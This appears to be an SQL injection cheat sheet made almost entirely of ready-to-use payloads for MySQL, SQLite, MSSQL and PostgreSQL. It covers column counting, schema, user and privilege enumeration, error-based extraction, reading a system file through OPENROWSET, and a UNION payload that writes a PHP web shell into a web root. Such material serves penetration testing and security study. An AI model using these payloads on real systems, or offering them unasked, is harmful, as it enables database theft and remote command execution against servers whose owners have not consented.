See Sqlmap
UNION#
MySQL#
Column number#
Union. Try until success
a' union select 1 -- -
a' union select 1,2 -- -
a' union select 1,2,3 -- -
a' union select 1,2,3,4 -- -
...Order by, try until fail
a' order by 1 -- -
a' order by 2 -- -
a' order by 3 -- -
a' order by 4 -- -
...DB name, table name#
TABLE_SCHEMA is the database name, TABLE_NAME is the table name
a' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = 'db_name' -- -Column name#
a' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'table_name' -- -User#
a' UNION SELECT 1,user(),3,4 -- -
a' UNION SELECT 1,CURRENT_USER(),3,4 -- -
a' UNION SELECT 1,user,3,4 from mysql.user -- -Privilege#
a' UNION SELECT 1,grantee,privilege_type,4 FROM information_schema.user_privileges -- -Where we can read/write file#
a' UNION SELECT 1,variable_name,variable_value,4 FROM information_schema.global_variables where variable_name="secure_file_priv" -- -Write webshell with union#
a' UNION SELECT '','<?php system($_REQUEST[0]); ?>','','' into outfile '/var/www/html/shell.php'-- -Sqlite#
Figure out column number#
Union. Try until success
a' union select 1 -- -
a' union select 1,2 -- -
a' union select 1,2,3 -- -
a' union select 1,2,3,4 -- -
...Order by, try until fail
a' order by 1 -- -
a' order by 2 -- -
a' order by 3 -- -
a' order by 4 -- -
...Figure out table name#
' UNION SELECT 1,2,3,group_concat(tbl_name) FROM sqlite_master-- -Figure out table schema#
' UNION SELECT 1,2,3,group_concat(sql) FROM sqlite_master WHERE name='users'-- -Error based#
MSSQL#
1' AND 1=(SELECT CONCAT_WS(0x3a,column1,column2) FROM TABLE)-- -1' AND 1=(SELECT column1 FROM TABLE)-- -Read file
1' AND 1=(SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents)-- -Postgressql#
1' AND 1=CAST((SELECT table_name FROM information_schema.tables LIMIT 1) as INT)-- -Blind SQL (Boolean and Time)#
See Blind SQLI